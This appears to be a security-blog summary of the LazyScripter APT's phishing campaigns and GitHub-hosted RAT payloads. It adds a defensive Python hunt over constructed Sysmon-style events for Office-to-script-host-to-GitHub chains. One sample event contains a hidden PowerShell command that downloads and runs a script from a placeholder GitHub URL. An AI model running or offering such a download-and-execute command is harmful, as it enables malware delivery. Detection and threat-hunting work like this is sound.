Researchers have disclosed malicious activity attributed to a previously unidentified actor. Dubbed LazyScripter, this threat actor has been active since 2018.
LazyScripter Discovered –
Late last year, researchers discovered several malicious documents, each embedding an object (a VBScript or batch file) crafted to target job seekers. These embedded objects were attributed to the LazyScripter APT group.
- The group targeted the International Air Transport Association (IATA) and airlines that use the BSPLink software.
- It also victimized users looking to immigrate to Canada in search of jobs.
- Across all of its recent phishing lures, the group used the KOCTOPUS loader to deploy Octopus and Koadic.
- It also dropped RATs such as LuminosityLink, Quasar, RMS, njRat, and Remcos, all of which are used by many other hacking groups as well.
A change in tools –
- In the past, the group mostly used spam emails carrying archive or document attachments as the initial infection vector; both the ZIP archives and the documents contained a variant of either KOCTOPUS or Empoder.
- Over time the group has used multiple file types as its initial phishing lures and has switched its main toolset from PowerShell Empire to a pair of RATs, Octopus and Koadic.
Using GitHub for Hosting Toolsets –
Like an Iran-linked APT group before it, LazyScripter hosts its toolsets on GitHub.
- The group created two GitHub accounts, LIZySARA and Axella49, in January and deleted them within the same month.
- Later, it created another GitHub account to host payloads for a spam campaign; that account has since been removed from GitHub.
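The delivery chain described above (a lure document carrying a VBScript or batch object, with the follow-on payload fetched from GitHub) leaves a recognizable trace in endpoint telemetry: an Office application spawning a script host whose subtree then talks to GitHub. The hunt below is an added example written for this page, not code from eScan or from the original researchers. The events are constructed, Sysmon-style records (process-create and network-connect fields), and the user and repository names in the URLs are placeholders, not LazyScripter indicators.

```python
"""Hunt for Office -> script host -> GitHub download chains in Sysmon-style events.

Added example for this page; the events below are constructed, not real telemetry.
"""
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe"}
# Matches github.com, raw.githubusercontent.com, objects.githubusercontent.com
GITHUB_HOSTS = ("github.com", "githubusercontent.com")

# Constructed events. Field names follow Sysmon EventID 1 (process create) and
# EventID 3 (network connect); hosts, PIDs, paths and URLs are made up.
SAMPLE_EVENTS = [
    # wsA: Word runs an embedded .vbs, which launches PowerShell to pull a stage from GitHub
    {"EventID": 1, "Host": "wsA", "ProcessId": 4100, "ParentProcessId": 3200,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"wscript.exe C:\Users\u\AppData\Local\Temp\Resume.vbs"},
    {"EventID": 1, "Host": "wsA", "ProcessId": 4200, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://raw.githubusercontent.com/example-user/example-repo/main/stage.ps1')\""},
    {"EventID": 3, "Host": "wsA", "ProcessId": 4200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "raw.githubusercontent.com", "DestinationPort": 443},
    # wsB: a developer cloning from a normal shell; no Office parent, must not be flagged
    {"EventID": 1, "Host": "wsB", "ProcessId": 510, "ParentProcessId": 400,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c git clone https://github.com/example-user/example-repo"},
    {"EventID": 3, "Host": "wsB", "ProcessId": 510, "Image": r"C:\Windows\System32\cmd.exe",
     "DestinationHostname": "github.com", "DestinationPort": 443},
    # wsC: Excel spawns cmd.exe for a dropped .bat but nothing reaches GitHub; still worth a look
    {"EventID": 1, "Host": "wsC", "ProcessId": 777, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\update.bat"},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def touches_github(text):
    t = text.lower()
    return any(h in t for h in GITHUB_HOSTS)


def hunt(events):
    """Return one finding per Office-spawned script host.

    Severity is "high" when that process or any descendant references GitHub on
    its command line or connects to a GitHub host, "medium" otherwise (an Office
    app spawning cmd/wscript is unusual enough on its own to merit triage).
    """
    creates = {(e["Host"], e["ProcessId"]): e for e in events if e["EventID"] == 1}
    children = defaultdict(list)
    for (host, pid), e in creates.items():
        children[(host, e["ParentProcessId"])].append((host, pid))
    conns = defaultdict(list)
    for e in events:
        if e["EventID"] == 3:
            conns[(e["Host"], e["ProcessId"])].append(e["DestinationHostname"])

    findings = []
    for key, e in creates.items():
        if basename(e["ParentImage"]) not in OFFICE_APPS or basename(e["Image"]) not in SCRIPT_HOSTS:
            continue
        # Walk the subtree: the .vbs/.bat stage usually hands off to another interpreter
        evidence, stack = [], [key]
        while stack:
            k = stack.pop()
            ev = creates[k]
            if touches_github(ev["CommandLine"]):
                evidence.append(f"cmdline pid {k[1]}: {ev['CommandLine']}")
            for dst in conns.get(k, []):
                if touches_github(dst):
                    evidence.append(f"network pid {k[1]} -> {dst}")
            stack.extend(children.get(k, []))
        findings.append({
            "host": key[0], "pid": key[1],
            "parent": basename(e["ParentImage"]), "image": basename(e["Image"]),
            "severity": "high" if evidence else "medium",
            "evidence": evidence,
        })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['parent']} -> {f['image']} (pid {f['pid']})")
        for line in f["evidence"]:
            print("    ", line)
```

The parent-process check is what keeps the developer's `git clone` on wsB out of the results; matching on GitHub hostnames alone would drown the finding in legitimate traffic. Because the accounts in this campaign were created and deleted within weeks, hunting on the behavior (Office parent plus script host plus GitHub download) ages better than hunting on the account names themselves.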
The group's behavior suggests it is continually refining its tools and attack tactics. Its reliance on freely available and commercial tools shows how effectively it repurposes off-the-shelf malware, and the combination of these strategies makes the group a dangerous threat.
To read more, please check the eScan Blog.